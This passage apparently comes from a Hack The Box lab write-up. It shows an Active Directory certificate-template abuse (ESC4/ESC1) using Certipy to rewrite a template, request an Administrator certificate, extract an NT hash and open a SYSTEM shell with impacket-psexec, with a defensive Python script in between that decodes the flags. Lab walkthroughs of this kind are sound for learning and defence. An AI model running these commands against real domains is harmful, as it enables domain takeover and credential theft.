[+]     msPKI-Private-Key-Flag: [b'16842768']
[+]     msPKI-Certificate-Name-Flag: [b'1']
[*] Successfully updated 'DunderMifflinAuthentication'
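The MODIFY_REPLACE values above are raw bitmasks. The script below, an added example that is not part of the writeup or of Certipy, decodes the documented CT_FLAG_* bits and judges whether the template lets a requester obtain a logon certificate for a principal of their choosing; BEFORE is taken from the certipy find output in 10.1 and AFTER from the certipy template output above, with any attribute not shown in either assumed unchanged.

```python
"""Decode the msPKI-* flags Certipy rewrote and assess the template state.
Added example; BEFORE/AFTER values come from the certipy output above."""

NAME_FLAGS = {  # msPKI-Certificate-Name-Flag (CT_FLAG_* bits)
    0x00000001: "ENROLLEE_SUPPLIES_SUBJECT",
    0x00010000: "ENROLLEE_SUPPLIES_SUBJECT_ALT_NAME",
    0x02000000: "SUBJECT_ALT_REQUIRE_UPN",
    0x08000000: "SUBJECT_ALT_REQUIRE_DNS",
    0x40000000: "SUBJECT_REQUIRE_COMMON_NAME",
}
ENROLL_FLAGS = {  # msPKI-Enrollment-Flag (CT_FLAG_* bits)
    0x00000002: "PEND_ALL_REQUESTS",      # manager approval
    0x00000008: "PUBLISH_TO_DS",
    0x00000020: "AUTO_ENROLLMENT",
    0x00080000: "NO_SECURITY_EXTENSION",  # issued certs carry no SID extension
}
# EKUs that make a certificate usable for Kerberos PKINIT / Schannel logon.
AUTH_EKUS = {"1.3.6.1.5.5.7.3.2",       # Client Authentication
             "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
             "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
             "2.5.29.37.0"}             # Any Purpose


def decode(value: int, table: dict) -> list:
    """Names of the bits set in a flag value (unknown bits are ignored)."""
    return sorted(name for bit, name in table.items() if value & bit)


def assess(t: dict) -> list:
    """Reasons the template can be used to impersonate another principal."""
    ekus = set(t["pKIExtendedKeyUsage"])
    supplies_subject = bool(t["msPKI-Certificate-Name-Flag"] & 0x1)
    approval = bool(t["msPKI-Enrollment-Flag"] & 0x2)
    # An empty EKU list is equivalent to Any Purpose: the cert is good for logon too.
    auth_capable = not ekus or bool(ekus & AUTH_EKUS)
    reasons = []
    if supplies_subject and not approval and auth_capable and t["msPKI-RA-Signature"] == 0:
        reasons.append("ESC1 shape: requester sets subject/UPN, no approval, logon-capable EKU")
    if not ekus:
        reasons.append("no EKU restriction (any purpose)")
    if t["msPKI-Enrollment-Flag"] & 0x80000:
        reasons.append("security extension disabled: issued certs carry no SID")
    return reasons


def diff(before: dict, after: dict) -> dict:
    """Attributes whose value changed, mapped to (old, new)."""
    return {k: (before[k], after[k]) for k in before if before[k] != after[k]}


# Template state from the 'certipy find' output (section 10.1).
BEFORE = {
    "msPKI-Certificate-Name-Flag": 0x40000000 | 0x08000000,  # SubjectRequireCommonName, SubjectAltRequireDns
    "msPKI-Enrollment-Flag": 0x20 | 0x8,                      # AutoEnrollment, PublishToDs
    "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2", "1.3.6.1.5.5.7.3.1"],  # Client + Server Authentication
    "msPKI-RA-Signature": 0,                                  # Authorized Signatures Required: 0
}
# State after 'certipy template' (section 10.2): name flag 1, enrollment flag 0, EKU list deleted.
AFTER = {**BEFORE, "msPKI-Certificate-Name-Flag": 1, "msPKI-Enrollment-Flag": 0, "pKIExtendedKeyUsage": []}

if __name__ == "__main__":
    for label, t in (("before", BEFORE), ("after", AFTER)):
        print(label, decode(t["msPKI-Certificate-Name-Flag"], NAME_FLAGS),
              decode(t["msPKI-Enrollment-Flag"], ENROLL_FLAGS), assess(t) or "no findings")
    print("changed:", sorted(diff(BEFORE, AFTER)))
```

Running the same assessment over a periodic LDAP export of CN=Certificate Templates gives a baseline diff that catches an ESC4 rewrite even when the attacker restores the template afterwards.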

10.3 Request an Administrator certificate with the malicious template

As ca_svc, use the modified template to obtain a certificate (.pfx) for Administrator

┌──(chw㉿CHW)-[~]
└─$ certipy req \
  -u ca_svc@sequel.htb \
  -hashes 3b181b914e7a9d5508ea1e********** \
  -ca sequel-DC01-CA \
  -template DunderMifflinAuthentication \
  -upn Administrator@sequel.htb \
  -dc-ip 10.10.11.51 \
  -out Administrator.pfx

Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 34
[*] Got certificate with UPN 'Administrator@sequel.htb'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'Administrator.pfx.pfx'

Certificate exported successfully

10.4 Authenticate with Certipy to obtain the Admin TGT / hash

Use the forged Administrator.pfx to authenticate to the KDC and obtain a Kerberos TGT and the NTLM hash

┌──(chw㉿CHW)-[~]
└─$ mv Administrator.pfx.pfx Administrator.pfx

┌──(chw㉿CHW)-[~]
└─$ certipy auth \
  -pfx Administrator.pfx \
  -dc-ip 10.10.11.51

Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@sequel.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@sequel.htb': aad3b435b51404eeaad3b435b51404ee:7a8d4e...e5a0b3ff

administrator NTLM hash obtained

10.5 SYSTEM Shell

Get a SYSTEM shell with the Admin hash

┌──(chw㉿CHW)-[~]
└─$ impacket-psexec sequel.htb/administrator@10.10.11.51 -hashes 'aad3b435b51404eeaad3b435b51404ee:7a8d4e...e5a0b3ff'
Impacket v0.13.0.dev0+20250430.174957.756ca96e - Copyright Fortra, LLC and its affiliated companies 

[*] Requesting shares on 10.10.11.51.....
[-] share 'Accounting Department' is not writable.
[*] Found writable share ADMIN$
[*] Uploading file sjIYOWbL.exe
[*] Opening SVCManager on 10.10.11.51.....
[*] Creating service VHxq on 10.10.11.51.....
[*] Starting service VHxq.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.6640]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32> 

✅ Get Root FLAG

image

tags: HTB Web CTF Windows